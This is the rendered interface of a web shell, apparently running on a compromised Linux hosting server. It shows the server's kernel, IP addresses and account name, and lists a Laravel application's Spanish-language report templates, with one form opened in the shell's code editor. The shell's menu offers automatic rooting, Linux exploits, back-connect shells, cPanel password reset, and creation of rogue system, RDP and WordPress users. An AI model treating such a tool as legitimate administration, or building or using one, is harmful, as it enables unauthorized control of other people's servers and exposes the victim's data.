Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.22
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
.trash /
resources /
views /
reporte /
[ HOME SHELL ]
Name
Size
Permission
Action
baja.blade.php
2.37
KB
-rw-r--r--
compras.blade.php
3.1
KB
-rw-r--r--
comprobantes.blade.php
3.62
KB
-rw-r--r--
delivery.blade.php
2.36
KB
-rw-r--r--
detalles.blade.php
3.25
KB
-rw-r--r--
deudores.blade.php
2.99
KB
-rw-r--r--
egresos.blade.php
2.35
KB
-rw-r--r--
fabricados.blade.php
2.86
KB
-rw-r--r--
guia.blade.php
2.35
KB
-rw-r--r--
kardex.blade.php
3.03
KB
-rw-r--r--
operario.blade.php
2.87
KB
-rw-r--r--
pedidos.blade.php
2.34
KB
-rw-r--r--
productos_comprados.blade.php
2.37
KB
-rw-r--r--
productos_historial.blade.php
2.02
KB
-rw-r--r--
productos_personal.blade.php
3.6
KB
-rw-r--r--
productos_vencidos.blade.php
2.13
KB
-rw-r--r--
productos_vendidos.blade.php
3.76
KB
-rw-r--r--
sire.blade.php
3.68
KB
-rw-r--r--
stock.blade.php
1.49
KB
-rw-r--r--
tipo_impuesto.blade.php
3.01
KB
-rw-r--r--
usuarios.blade.php
8.11
KB
-rw-r--r--
ventas.blade.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : productos_historial.blade.php
@extends('layout.main') @section('content') <div class="sixteen wide tablet fourteen wide computer column "> <div class="ui segment"> <h4 class="ui dividing header teal centered">REPORTE DE HISTORIAL DE UN PRODUCTO</h4> <br> <form class="ui form" id="frmComprobante" autocomplete="off"> <div class="three fields"> <div class="four wide field"> <div class="ui fluid large white label">Nombre del Producto</div> </div> <div class="eleven wide field"> <select class="ui search selection" name="id_producto"> </select> </div> </div> <div class="four fields"> <div class="four wide field"> <div class="ui fluid large white label">Fecha Inicio</div> </div> <div class="field"> <div class="ui small input"> <input type="text" class="fecha1" name="fecha1"> </div> </div> <div class="three wide field"> <div class="ui fluid large white label">Fecha Fin</div> </div> <div class="field"> <div class="ui small input"> <input type="text" class="fecha2" name="fecha2"> </div> </div> </div> <div class="form_footer"> <div class="ui right floated primary button btn_reporte_producto_historial"><i class="download icon"></i>DESCARGAR REPORTE</div> </div> </form> </div> </div> @stop @section('scripts') <script src="{{ asset('js/reporte/comprobantes.js') }}"></script> @stop
Close